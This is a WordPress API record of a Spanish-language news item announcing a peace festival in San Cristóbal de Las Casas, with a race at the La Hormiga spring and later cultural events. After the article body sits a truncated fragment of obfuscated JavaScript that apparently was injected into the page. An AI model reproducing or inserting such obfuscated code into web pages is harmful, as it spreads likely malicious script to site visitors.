{"id":15381,"date":"2024-05-01T01:44:27","date_gmt":"2024-05-01T01:44:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15381"},"modified":"2024-05-01T01:44:28","modified_gmt":"2024-05-01T01:44:28","slug":"anuncian-festival-por-la-paz-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15381","title":{"rendered":"Anuncian Festival por la Paz en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"856\" height=\"588\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240430-WA0019.jpg\" alt=\"\" class=\"wp-image-15382\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240430-WA0019.jpg 856w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240430-WA0019-300x206.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240430-WA0019-768x528.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/IMG-20240430-WA0019-110x75.jpg 110w\" sizes=\"auto, (max-width: 856px) 100vw, 856px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>30 de abril del 2024. San Crist\u00f3bal de Las Casas.- El Festival por la Paz, un encuentro que promueve la armon\u00eda y el respeto a trav\u00e9s del deporte y la cultura, dar\u00e1 inicio el pr\u00f3ximo 3 de mayo en esta ciudad, seg\u00fan anunci\u00f3 Joaqu\u00edn Garc\u00eda, presidente del Consejo de la Zona Norte de la ciudad.<\/p>\n\n\n\n<p>El evento inaugural ser\u00e1 una carrera de atletismo que se llevar\u00e1 a cabo en el manantial La Hormiga. Garc\u00eda destac\u00f3 la importancia que los pueblos originarios de la regi\u00f3n otorgan a los manantiales, consider\u00e1ndolos lugares de gran significado y respeto. \u201cPor ello, se ha elegido este emblem\u00e1tico lugar como escenario para la competencia deportiva\u201d.<\/p>\n\n\n\n<p>&#8220;Estamos invitando a todos los atletas a participar en esta carrera, que contar\u00e1 con un premio de 20 mil pesos. La competencia estar\u00e1 abierta a participantes de todas las edades y g\u00e9neros, con una categor\u00eda libre. Los interesados podr\u00e1n registrarse el mismo d\u00eda del evento, a partir de las ocho de la ma\u00f1ana, o a trav\u00e9s de la p\u00e1gina de Facebook oficial del Festival, donde encontrar\u00e1n informaci\u00f3n detallada y los nombres de las personas encargadas de la coordinaci\u00f3n\u201d, detall\u00f3.<\/p>\n\n\n\n<p>Previo al inicio de la carrera, se llevar\u00e1 a cabo un rezo maya al interior del manantial, como muestra de respeto y conexi\u00f3n con las tradiciones ancestrales de la regi\u00f3n. \u201cLa carrera comenzar\u00e1 en el perif\u00e9rico, recorriendo diversos puntos emblem\u00e1ticos de la zona, y culminar\u00e1 en el mismo manantial donde se dar\u00e1 inicio al evento\u201d.<\/p>\n\n\n\n<p>\u201cAdem\u00e1s de la carrera de atletismo, el Festival por la Paz contempla una serie de actividades culturales que se desarrollar\u00e1n a partir del 15 de mayo en la colonia Erasto Urbina, ofreciendo una amplia gama de expresiones art\u00edsticas y culturales para disfrute de la comunidad\u201d.<\/p>\n\n\n\n<p>Finalmente, dijo que el Festival por la Paz se presenta como una oportunidad para promover la convivencia pac\u00edfica, el respeto a la diversidad cultural y el fomento del deporte como medio de integraci\u00f3n social en San Crist\u00f3bal de Las Casas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 30 de abril del 2024. San Crist\u00f3bal de Las Casas.- El Festival por la Paz, un encuentro que promueve la armon\u00eda y el respeto a trav\u00e9s del deporte y la cultura, dar\u00e1 inicio el pr\u00f3ximo 3 de mayo en esta ciudad, seg\u00fan anunci\u00f3 Joaqu\u00edn Garc\u00eda, presidente del Consejo de la Zona Norte &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15382,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15381","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15381","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15381"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15381\/revisions"}],"predecessor-version":[{"id":15383,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15381\/revisions\/15383"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15382"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15381"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15381"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15381"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}